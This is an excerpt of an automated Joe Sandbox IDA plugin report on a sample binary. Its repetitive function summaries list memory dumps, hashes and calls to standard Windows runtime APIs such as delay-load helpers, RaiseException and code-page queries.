                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 97c7d3d6a6c2a6edfbe4ea32b2d457271a8d564070a19c419d409e1e72e14654
                                                                                  • Instruction ID: 07b033846c9c579c35d167c38639e041f9f25a8313aee7eff0676a1f89eaa467
                                                                                  • Opcode Fuzzy Hash: 97c7d3d6a6c2a6edfbe4ea32b2d457271a8d564070a19c419d409e1e72e14654
                                                                                  • Instruction Fuzzy Hash: D9A001EA7BA142BD390872526D4AC3F021EC4C7B61372892EF81AD44D1AC907C651E71
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  • Opcode ID: 4379e5166d81d37a599c64fc968ce3f8ab885a3a58407b9e561d13dbbba83e65
                                                                                  • Instruction ID: 760f78669b28f3df8b41872cc45d8e9709894b0c2b1658c235231c2fb28d46c4
                                                                                  • Opcode Fuzzy Hash: 4379e5166d81d37a599c64fc968ce3f8ab885a3a58407b9e561d13dbbba83e65
                                                                                  • Instruction Fuzzy Hash: 4DA011CA2BA002BC3808B2002C02C3F020EC0C3F203B2882EF802800C0AC800C200E30
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  • Opcode ID: 7b4200bc061f85fbd04286b0e395a78e87fc9944be4e656ed46d31628916fa75
                                                                                  • Instruction ID: c2e5e9eab085493193875e14af98a2389da24dbd3742eda6d8c4182419f8181f
                                                                                  • Opcode Fuzzy Hash: 7b4200bc061f85fbd04286b0e395a78e87fc9944be4e656ed46d31628916fa75
                                                                                  • Instruction Fuzzy Hash: 38A011CA2BA0003C3808B2A02C03C3B020EC0C2F22332822EF800800C0AC8008300E30
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  • Opcode ID: 8dd7071b102f980bebedf58975e01e4a02352b932d742926218560539855fe89
                                                                                  • Instruction ID: 760f78669b28f3df8b41872cc45d8e9709894b0c2b1658c235231c2fb28d46c4
                                                                                  • Opcode Fuzzy Hash: 8dd7071b102f980bebedf58975e01e4a02352b932d742926218560539855fe89
                                                                                  • Instruction Fuzzy Hash: 4DA011CA2BA002BC3808B2002C02C3F020EC0C3F203B2882EF802800C0AC800C200E30
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  • Opcode ID: 2ed37d26a768ba4539a82cbd1de58fffc078691b6a147e9a983d19c1aa9c9cd9
                                                                                  • Instruction ID: 760f78669b28f3df8b41872cc45d8e9709894b0c2b1658c235231c2fb28d46c4
                                                                                  • Opcode Fuzzy Hash: 2ed37d26a768ba4539a82cbd1de58fffc078691b6a147e9a983d19c1aa9c9cd9
                                                                                  • Instruction Fuzzy Hash: 4DA011CA2BA002BC3808B2002C02C3F020EC0C3F203B2882EF802800C0AC800C200E30
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  • Opcode ID: 88662b53125c86aa864e3fa9bc456bf6a6e871119e85ef7bb71cbbad1968e22f
                                                                                  • Instruction ID: 760f78669b28f3df8b41872cc45d8e9709894b0c2b1658c235231c2fb28d46c4
                                                                                  • Opcode Fuzzy Hash: 88662b53125c86aa864e3fa9bc456bf6a6e871119e85ef7bb71cbbad1968e22f
                                                                                  • Instruction Fuzzy Hash: 4DA011CA2BA002BC3808B2002C02C3F020EC0C3F203B2882EF802800C0AC800C200E30
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  • Opcode ID: 8b101066ec94135dabe679650f717214a1b60713c9d38bcef4698b3f070187f0
                                                                                  • Instruction ID: 3af25683c650ac8db9185e8c1c48c9d65a048f0f0b9e855eebf3b4587bfd0c07
                                                                                  • Opcode Fuzzy Hash: 8b101066ec94135dabe679650f717214a1b60713c9d38bcef4698b3f070187f0
                                                                                  • Instruction Fuzzy Hash: 43A001DA6BE152BD3918B6A16D07C3B021EC4C6F65372992EF816854D1AC8418751E71
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  • Opcode ID: c6dc79af9edd073b194b75aa98dcdb025d43502545db96452db0bf8e397f59d8
                                                                                  • Instruction ID: 3af25683c650ac8db9185e8c1c48c9d65a048f0f0b9e855eebf3b4587bfd0c07
                                                                                  • Opcode Fuzzy Hash: c6dc79af9edd073b194b75aa98dcdb025d43502545db96452db0bf8e397f59d8
                                                                                  • Instruction Fuzzy Hash: 43A001DA6BE152BD3918B6A16D07C3B021EC4C6F65372992EF816854D1AC8418751E71
                                                                                  APIs
                                                                                    • Part of subcall function 0029B7BB: GetOEMCP.KERNEL32(00000000,?,?,0029BA44,?), ref: 0029B7E6
                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0029BA89,?,00000000), ref: 0029BC64
                                                                                  • GetCPInfo.KERNEL32(00000000,0029BA89,?,?,?,0029BA89,?,00000000), ref: 0029BC77
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CodeInfoPageValid
                                                                                  • String ID:
                                                                                  • API String ID: 546120528-0
